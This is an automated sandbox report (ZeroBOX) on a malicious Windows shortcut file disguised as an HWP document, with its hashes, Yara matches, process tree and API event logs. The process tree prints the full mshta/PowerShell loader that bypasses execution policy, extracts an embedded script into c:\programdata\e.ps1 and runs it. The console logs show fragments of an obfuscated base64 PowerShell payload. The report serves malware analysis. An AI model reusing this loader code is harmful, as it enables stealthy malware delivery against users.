Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	April 3, 2025, 10:10 a.m.	April 3, 2025, 10:12 a.m.

Size	6.5KB
Type	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=0, Archive, ctime=Fri May 7 23:14:46 2021, mtime=Fri May 7 23:14:46 2021, atime=Fri May 7 23:14:46 2021, length=32768, window=hide
MD5	`f97ee8a4bfe37d23914da3e63a5bb1b5`
SHA256	`f2a7da1770a719b0dc700f14d156cdc753259c11a9d342aeaaf84fc9b3ec5a2c`
CRC32	`65235002`
ssdeep	`192:8Lg2WfwNqhbfM3YULz/LRf5bNjVdHxdFPxzr2t:Wg7eUbE3JbbtV9/zr2t`
Yara	lnk_file_format - Microsoft Windows Shortcut File Format Lnk_Format_Zero - LNK Format Generic_Malware_Zero - Generic Malware

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "GQRGkj" C:\Users\test22\AppData\Local\Temp\20250402_62842.hwp.lnk
2544
- mshta.exe "C:\Windows\System32\mshta.exe" javascript:a="pow"+"ershell -ep bypa"+"ss ";g="c:\\pro"+"gramdata\\";m=" -Encoding Byte;sc ";p="$w ([byte[]]($f "+"| select -Skip 0x0942)) -Force";s="a=new Ac"+"tiveXObject('WSc"+"ript.Shell');a.Run(c,0,true);close();";c=a+"-c $t=0x1a2b;$k = Get-ChildItem *.lnk | where-object {$_.length -eq $t} | Select-Object -ExpandProperty Name;if($k.co"+"unt -eq 0){$k=G"+"et-ChildItem $env:TEMP\\*\\*.l"+"nk | where-object{$_.length -eq $t};};$w='"+g+"e.ps1';$f=gc $k"+m+p+m+g+"4214 0;"+a+"-f $w;";eval(s);
  2656
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -c $t=0x1a2b;$k = Get-ChildItem *.lnk | where-object {$_.length -eq $t} | Select-Object -ExpandProperty Name;if($k.count -eq 0){$k=Get-ChildItem $env:TEMP\*\*.lnk | where-object{$_.length -eq $t};};$w='c:\programdata\e.ps1';$f=gc $k -Encoding Byte;sc $w ([byte[]]($f | select -Skip 0x0942)) -Force -Encoding Byte;sc c:\programdata\4214 0;powershell -ep bypass -f $w;
    2784
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -f c:\programdata\e.ps1
      2892

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (12 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 3, 2025, 10:10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 3, 2025, 10:10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 3, 2025, 10:10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 3, 2025, 10:10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 3, 2025, 10:10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 3, 2025, 10:10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 3, 2025, 10:10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 3, 2025, 10:10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 3, 2025, 10:10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 3, 2025, 10:10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 3, 2025, 10:10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 3, 2025, 10:10 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 3, 2025, 10:10 a.m.			0	0
IsDebuggerPresent April 3, 2025, 10:10 a.m.			0	0

Command line console output was observed (50 out of 60 events)

Time & API	Arguments	Status	Return
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: Unexpected token '(' in expression or statement. console_handle: 0x00000023	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: At C:\programdata\e.ps1:1 char:1691 console_handle: 0x0000002f	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: + $bc82=@();$wck0="vw7ICMzkzUgYnbFJSPuNHJyzbc"[21..2];$ehk1="uytUmdv1WZSpQDdhm" console_handle: 0x0000003b	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: [13..2];$syg2="rtyBHXcpzYnASblRXSuwyz"[17..2];$acf3="psMzBnLlxFXhRXYk1WYyd2bxcg console_handle: 0x00000047	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: lr"[22..2];$yfn4="stv7cSwyab"[5..3];$eiko5=$wck0+$ehk1+$syg2+$acf3+$yfn4;$bc82+ console_handle: 0x00000053	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: =$eiko5 -join '';$qwe6="oqsJscCdzVWdxdCLnUmUiV2JgYWLi0XM71HM713M71nM7JCKusjIwlm console_handle: 0x0000005f	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: euM3ZcxVY0FGZtFmcisiIn9mcwxFX6MmIg0DImJzMwYXbvZWZzRye5JHdgkgCNASCK0wOiETPsRmJ4Z console_handle: 0x0000006b	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: DdrlzNodTP0NnJnNncyBHO4EWen9GewFDMzgmbqZmc0t2Yx1TeltGby9DdhRmLtN1L3EzbzhGd1MzZ5 console_handle: 0x00000077	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: dTOul2a6JTa5k2NvkmZvw2Yz9SbvNmL49mYisiIw9mck5yd3d3LvozcwJyKiQHdoJCI9AidzZHZkACI console_handle: 0x00000083	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: gACIK0weg0DIxUGJtuwy"[307..3];$zbe7="orwsyJzdnIgIHdvASX3MzN4kDNzITO3s1JrcyZulGZ console_handle: 0x0000008f	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: uFGc4V0JrcSZ0FGZwVVZnR2JrcSR0Z2bz9mcjl2JrcSTHFEIuR3LgIDIv12LgUGd15WatByYz9CIlRX console_handle: 0x0000009b	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: YlJ3YvAycrdyKnMXY0h2YzdCI9AyZkASCK0AIJoQD7gGc4VGJgQULgYmMzAjdt9mZlNHJggGdhBVLgU console_handle: 0x000000a7	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: mdph2YyFULk5WYwhXR7ISY0FGZtFmcn9mcQxFX6MkIg0DIoBHelRyO9ZmMzAjdt9mZlN3ekASZslmR0 console_handle: 0x000000b3	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: V3TtASf2NndktHJgkyJX1SZrdCLn8mdul0aej"[312..3];$qwe8="oqLgo1UfdURSBCdvAiMldyKnQ console_handle: 0x000000bf	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: XYkBXVHBidvAiIudyKnUnUc52bpNnclZFduVmcyV3QcN3dvR2J9M2bxRyOnY2LgICctRnL1QTN2IDXc console_handle: 0x000000cb	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: FGdhRUbnsyJhJ3ZvJHUcxlODBCdwl2JrcicjNXY2Fma6cyKnU2LvAiYv8CIlhXZuQHcpdyKnI3YzdHX console_handle: 0x000000d7	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: cJzMnsyJtVGdzl3ccx1c3dSPxMWarRyOnRCIj9CIk12Y7ciZvAiIw1GduUDN1YjMcxVY0FGRtFmcn92 console_handle: 0x000000e3	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: JrcicQxFX6MEIi9yLgQHcpdyKnI3YzFmdnsyJhpmOl9yLgQHcpJ3Ynsuvx"[315..2];$yad0="mqME console_handle: 0x000000ef	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: I05WZisiI052bD1CdldEKg42bpJyKiM3cisiIlJHc4VULlJyKis2b25WSgICI9ASdkASCK0wepUWdyR console_handle: 0x000000fb	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: HJoUGbph2dgkgCNsTf7h2Y0F2Y9tjZyMDM212bmV2ckACblR2Ox4mc0RCIj9CIk12Y7MDbtRyK5lGdu console_handle: 0x00000107	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: VHJ9EjbyRHJ7IzYz9GJrEDcmRSPzwWbkszJIJCIkRWYgcWZn0TMwZGJ7cicnASPgkXa05WdkszYvFHJ console_handle: 0x00000113	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: rcibpdFX0Z2bz9mcjdyKnkWTcVmchdHdm92UcV1QLdSPyM2cvRyOxMWarRCIrcybk5Wa3xFX6MmIgQ2 console_handle: 0x0000011f	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: uzekq"[319..2];$ltuw23={param($elr60)foreach($gik91 in $elr60) {$tux43=[Convert console_handle: 0x0000012b	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: ]::("Fro"+"mBase6"+"4Stri"+"ng")( <<<< $gik91);$ehk94=-join ($tux43 -as [char[] console_handle: 0x00000137	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: ]);.("Inv"+"oke-"+"Expre"+"ssion") $ehk94;}};$xem1="rs=0nCN0HIJoQD7kCMyEDKwVWZs console_handle: 0x00000143	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: NFI7UHJgMWLgM3chBXeiBCcl1CIsxWZoNncld3bwtjI7kCctRnL1gzM5IyKi4UQcxVY0FGRtFmcisiI console_handle: 0x0000014f	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: n9mcQxFX6uwxz"[114..2];$dgkn2=$qwe6+$zbe7+$qwe8+$yad0+$xem1;$bc82+=$dgkn2 -join console_handle: 0x0000015b	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: '';$qxf3="qstXZH5yY0RCI9ASbyR3cksTKwRCIsIHJoQnbllGbDB3YU5yc0V2aj92UuQXZO5SblR3 console_handle: 0x00000167	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: c5NFI0NWZqJ2TtcXZOBSPgMGdkkwOdFzWjJmYzVFJg0DIwRyOdBzWjJmYzVFJg0DIyRye5JHdK0wOpc console_handle: 0x00000173	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: SO5YjNnwyJ1UDO4cCLngDNx4SO14CMy4CN2cCK9MmYiNXVkoQDK0Qf7EDckASPgwGblh2UyV2dvB1Op console_handle: 0x0000017f	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: gSZr9mdulkbpdWZC5SMwRCI9ASZjFGcz5WdStHQgkHdyVGcvJHUtACdjVmai90UQBSZtFmTlBXeU1CI console_handle: 0x0000018b	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: 0NWZqJ2TtcXZOBSPgomYPJ2bKRiCNsTKxUGJoQHcpJ3YTRGZB5SMwRiCNsDcyRCI9ACbv9GUlNWYwNn console_handle: 0x00000197	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: b1JlLxAHJK0wOpgSZ0FWZyNkO60FbsVGazJXZ39GcbBSPgEDckoQDpgiblB3TuAncksTK1ACLxgCbv9 console_handle: 0x000001a3	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: GUlNWYwNnb1JVZ0FWZyNkO60Vey9GdjFmZlNWYwNnb1J3Wg0DIwJHJuwybe"[516..3];$iko4="chc console_handle: 0x000001af	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: QxFX6MEI0BXansyJyN2chZXYqpzJrcSZv8CIi9yLgUGel5Cdwl2JrcicjN3dcxlMzcyKn0WZ0NXezxF console_handle: 0x000001bb	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: Xzd3J9EzYptGJ7QHJgwWZktzJhRXYk1WYyd2byBFXcpzQnACRtACdkACa0FGUtASZ2lGajJXQtQmbhB console_handle: 0x000001c7	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: HeFtTZ0lnQgcmbpR2bj5WRtAiYkAiVtACdkACa0FGUtACduVGdu92QtQXZTtzJwlmeusGXcFGdhRWbh console_handle: 0x000001d3	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: J3ZvJHccxlOjdSP0RyOpoHJocmbpJHdTRjNlNXYC12byZkO60FdyVmdu92Qb1jYksXKwASZu1CIoR3Z console_handle: 0x000001df	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: uVGTuoHJoYWa9tTM0RCI9sCI6RCI7kCKl5WaMRWYlJlLxRSPxQHJ7BSKgETLgUmbtASKosWZlBlLxRC console_handle: 0x000001eb	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: Iy9WLgUGbiFGbpFmdBFGdhRkLtJHdzRCKgUGbph2d7cyJg0DI6RyOp0mc0NHJoIXZkFWZS1WYlJHdT5 console_handle: 0x000001f7	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: yTJ5SblR3c5NFI0NWZqJ2TtcXZO1TcksTKo0WYlJHdTRnuck"[520..2];$lmo5="tuhRXYE1WYyd2b console_handle: 0x00000203	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: nsyJyBFXcpzQgI2LvACdwl2JrcicjNXY2dyKnEma6U2LvACdwlmcjdyKnM3diAic09CIdNzN5ATM3kj console_handle: 0x0000020f	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: M4MzWnsyJn5Wak5WYwhXRnsyJlRXYkBXVldGZnsyJFRnZvN3byNWansyJNFEIuR3LgIDIv12LgUGd15 console_handle: 0x0000021b	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: WatByYz9CIlRXYlJ3YvAycrNXY0dyKng2YzdCI9AyZksTMuJHdkAyYvACZtN2OzAXb0RyK5lGduVHJ9 console_handle: 0x00000227	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: EjbyRHJ7IDctRHJrEDctRHJ9MDctRHJ7cCSiACZkFGInV2J9EDctRHJ7cicnASPgkXa05WdkszYvFHJ console_handle: 0x00000233	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: rcibpdFX0Z2bz9mcjdyKnkWTcVmchdHdm92UcV1QLdSPyAXb0RyOxMWarRCIrcybk5Wa3xFX6MmIgQ2 console_handle: 0x0000023f	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: Lgo1UfdURSBCdvASZnsyJ0FGZwV1UgY3LgIibnsyJ1JFXu9WazJXZWRnblJnc1NEXzd3bkdSPj9Wcks console_handle: 0x0000024b	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: zJm9CIiMnauEzNzkjTcxVY0FGRtdyKnEmcn9mwzcfi"[524..2];$mqu6="krvB3OxYnbjJmYTRFJgU console_handle: 0x00000257	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: GbpZUL0V3TgwHIjRyOiEzcw5iMzBXb0xVY0FGZtFmcn9mcwxlOjJCI9ASM252YiJ2UURyepADIl5WLg console_handle: 0x00000263	1	1
WriteConsoleW April 3, 2025, 10:10 a.m.	buffer: gGdn5WZM5yYkgiZp13OyQHJg0zKgMGJgsTKoUmbpxEZhVmUuIjck0jM0RyegkCIx0CIl5WLgkCKrVWZ console_handle: 0x0000026f	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 89 events)

Time & API	Arguments	Status	Return
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0077f210 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0077f7d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0077f7d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0077f7d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0077fb10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0077fb10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0077fb10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0077fb10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0077fb10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0077fb10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0077f690 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0077f690 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0077f690 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0077f7d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0077f7d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0077f7d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0077f2d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0077f7d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0077f7d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0077f7d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0077f7d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0077f7d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0077f7d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0077f7d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0077ee90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0077ee90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0077ee90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0077ee90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0077ee90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0077ee90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0077ee90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0077ee90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0077ee90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0077ee90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0077ee90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0077ee90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0077ee90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0077ee90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0077f390 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0077f390 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0077f390 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0077f390 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0077f390 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0077f390 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0077f390 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c3a80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c4840 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c4840 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c4840 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c4740 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 3, 2025, 10:10 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 284 events)

Time & API	Arguments	Status
NtProtectVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2656 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73352000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2656 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x034c0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2656 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x034c0000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2784 region_size: 786432 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02970000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x71671000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0201a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x71672000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02012000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02022000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029f1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2784 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020ca000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02023000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02024000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
